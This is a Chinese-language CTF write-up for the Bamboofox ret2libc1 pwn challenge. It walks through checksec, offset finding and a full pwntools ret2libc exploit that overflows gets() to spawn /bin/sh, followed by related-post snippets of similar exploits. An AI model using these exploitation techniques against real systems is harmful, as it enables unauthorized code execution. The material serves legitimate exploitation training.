Bamboofox ret2libc1解题过程

已于 2023-09-26 12:05:28 修改
阅读量71 收藏
点赞数
文章标签: 网络
于 2023-09-25 16:39:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55013445/article/details/133275741
版权

分析

题目链接

  1. 通过checksec分析可知本题仅开启了NX保护,说明不能直接进行栈溢出把shell写在栈上然后执行
  2. 接着使用IDA进行反汇编对代码分析可知,该程序使用了gets函数对s数组进行输入,双击s可以发现其处于.bss段上(通过vmmap可知bss段可读可写可执行)
  3. 同时在IDA中发现了system.plt段地址
    到此,思路明确,使用ret2libc来capture the flag

解题

在gdb中使用

cyclic 200
cyclic -l invaild_address

来获取偏移量
接着使用

ROPgadget --binary retlibc1 --string "/bin/sh"

获取/bin/sh地址
最后exploit.py如下

from pwn import *

context(arch = 'i386',os = 'linux')

p = process('./ret2libc1')

elf = ELF('./ret2libc1')

bss_addr = elf.bss()
gets_addr = 0x8048430
system_addr = 0x08048460
binsh_addr = 0x8048720
print("bss_addr = " + hex(bss_addr))
print("gets_addr = " + hex(gets_addr))

payload = b'a' * 112 + p32(system_addr) + b'a' * 4 + p32(binsh_addr)

p.sendline(payload)

gdb.attach(p)

p.interactive()
mick0960
关注
ret2libc pwn
qq_41560595的博客
09-27 852
查看栈保护 F5查看源代码 看见gets函数,立刻想到是栈溢出型,但是此并未提供system("/bin/sh")函数。而程序运行的时候会调用libc.so,它包含了system()等函数,因此可以根据这个特性构造system("/bin/sh")。 判断覆盖量 查找system()的地址 objdump -d -j .plt ./ret 查找/bin/sh的地址 编写脚本 from pwn import * p=process('./ret') system_addr=0x08048460
Ret2libc 1
weixin_44864859的博客
05-19 733
Ret2libc 1 目代码和之前一样,gets函数存在栈溢出。同时也存在system函数,但是不同之处是我们不能直接跳转到system(“shell!?”)。因为我们要执行的是system(“bin/sh”)。 首先,我们可以在内存中搜索一下看有没有这个字符串 我们可以看到在0x8049720存在我们需要的字符串 那么,我们直接返回该处,即执行 system 函数。相应的 payload 如下 from pwn import * sh = process('./ret2libc1') binsh_
从零开始学逆向:理解ret2libc-1
weixin_44626085的博客
02-19 1551
ret2libc即劫持程序的控制流,使其执行libc中的函数,一般是返回到某个函数的plt处,或者某个函数的具体位置(函数对应got表的内容),大多情况下是执行system('/bin/sh')。
pwn之ret2libc1
m0_75234353的博客
04-09 113
提示:payload中的BBBB,本来是exit函数,但是系统的崩溃不妨碍我们拿到flag。所以简化版就是直接填入BBBB垃圾字节。用python3计算偏移量,可得108,再加上4字节达到返回地址。看到system函数,我们可以构建ROP链来替换参数。4.利用pwntools来构造payload。发现gets函数,为栈溢出点。栈溢出保护关,栈执行关闭。3.计算所需填充的垃圾数据。
栈溢出/ret2shellcode/ret2syscall/ret2libc
m0_63220798的博客
08-20 396
(仅作为本人的学习笔记和心得 如有错误请多指教)
ret2libc3
m0_49959202的博客
08-06 401
文章目录ret2libc31.程序分析2.栈帧设计3.exp编写 ret2libc3 当前的ret2libc3:无system,无”\bin\sh“ 1.程序分析 首先file一下,发现是32位程序: checksec一下,发现没有开启pie ida分析程序: 发现有个See_something()函数可以用来泄露具体给定地址内的信息: main函数内还有个Print_message(),可以用来栈溢出: [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-SKJoX7
17ret2libc1_64 pwn 入门
02-11
pwn 入门
ret2libc1pwn 入门
02-11
pwn 入门
ret2libc2pwn 入门
02-11
pwn 入门
ROP-基础-ret2libc1
热门推荐
ATFWUS的博客
02-28 1万+
文件下载地址: 链接:https://pan.baidu.com/s/1DN4q7Dl5J45rIysA0DvZ5A 提取码:0wn8 0x01.分析 checksec: Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enab...
[CTF]PWN--新人入门第一关--Ret2libc
最新发布
2301_79880752的博客
02-29 1298
首先我们需要找到pop rdi|ret这个指令在程序中的位置(前面提到该指令为程序中自带的,只不过需要我们去寻找),然后让程序返回到pop rdi|ret这个指令上去执行它,通过ROPgadget --binary pwn --only 'pop|ret' 该指令来寻找pop |ret这个指令的地址,其中ROPgadget为一个插件,需要自己下载,binary意思为一个二进制文件,后面跟着的是文件名,only后面跟着的为要搜索的命令地址。
好好说话之ret2libc1
hollk’s blog
06-22 1514
目路径: /ctf-challenges/pwn/stackoverflow/ret2libc/ret2libc1 一、原理 ret2libc 即控制函数的执行 libc 中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),故而此时我们需要知道 system 函数的地址 看C代码...
Bamboofox ret2libc2解题过程
weixin_55013445的博客
09-25 133
Bamboofox ret2libc2解题过程
pwn学习笔记(4)ret2libc
qq_66013948的博客
02-19 1246
​ 静态链接是由链接器在链接时将库的内容加入到可执行程序中的做法。链接器是一个独立程序,将一个或多个库或目标文件(先前由编译器或汇编器生成)链接到一块生成可执行程序。这里的库指的是静态链接库,Windows下以.lib为后缀,Linux下以.a为后缀。​ 也就是说将静态链接库中的所有的函数都写入这个ELF文件中,所以会造成该二进制文件极为庞大,因此也会存在很多的可供利用来ret2syscall的gadgets。但是,使用静态链接生成的可执行文件体积较大,包含相同的公共代码,造成浪费。
【PWN · ret2libc】ret2libc1
Mr_Fmnwon的博客
05-08 1518
当函数运行到调用库函数时,程序将访问对应函数的plt表项,plt表项存着代码,代码分为两部分:第一部分,跳转到对应的got表。第二部分,查找函数的真实地址,修改got表内容。 got表项存着一个地址。然而这个地址并不一开始就是libc中函数的真实地址。 一开始,got表项中地址指向plt代码的第二部分。后来,因运行plt第二部分代码段,got表内容被修改为真实函数地址。依据以上,我们可以......分享几个实用的干货小技巧,不用IDA解决此
pwn做之ret2libc1
2303_79500944的博客
01-24 1037
(shellcraft.sh(),asm(shellcraft.sh()))这两条都是不能在这派上用场。system(里面的参数要的是/bin/sh而不是shell!开启了NX意味着通常情况下不能执行自己编写的shellcode。找到system_plt的地址最后也能执行system真实地址。system("/bin/sh")才算拿到程序控制权。虽然有system但是没起到后门函数的作用。system参数位置在往上俩个字节。攻击这道的通用结构。
PWN基础之构造ROP链(基本ROP)
weixin_46132162的博客
02-02 4618
​随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是(Return Oriented Programming),其主要思想是在**栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。**所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
栈溢出学习
feng的博客
01-16 1947
前言 跟着ctfwiki学习,所有目都在ctfwiki上可以找到。加油加油。 栈溢出原理 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变。 看一个简单的程序: #include <stdio.h> #include <string.h> void success() { puts("You Hava already controlled it."); system("/bin/sh"); } void
基本ROP
听鬼哥说故事
08-29 8679
随着NX保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是ROP(Return Oriented Programming),其主要思想是在**栈缓冲区溢出的基础上(这一条之后不再重复提及),通过利用程序中已有的小片段(gadgets)来改变某些寄存器或者变量的值,从而改变程序的执行流程。**所谓gadgets就是以ret结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
深入理解ret2libc攻击:无壳代码控制
在IT安全领域,"Performing a ret2libc Attack-InVoLuNTaRy" 是一篇关于高级攻击技术的教程,主要讲解如何利用ret2libc(Return to Library Call)漏洞进行攻击。ret2libc是一种针对栈溢出漏洞的利用方法,它让攻击...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值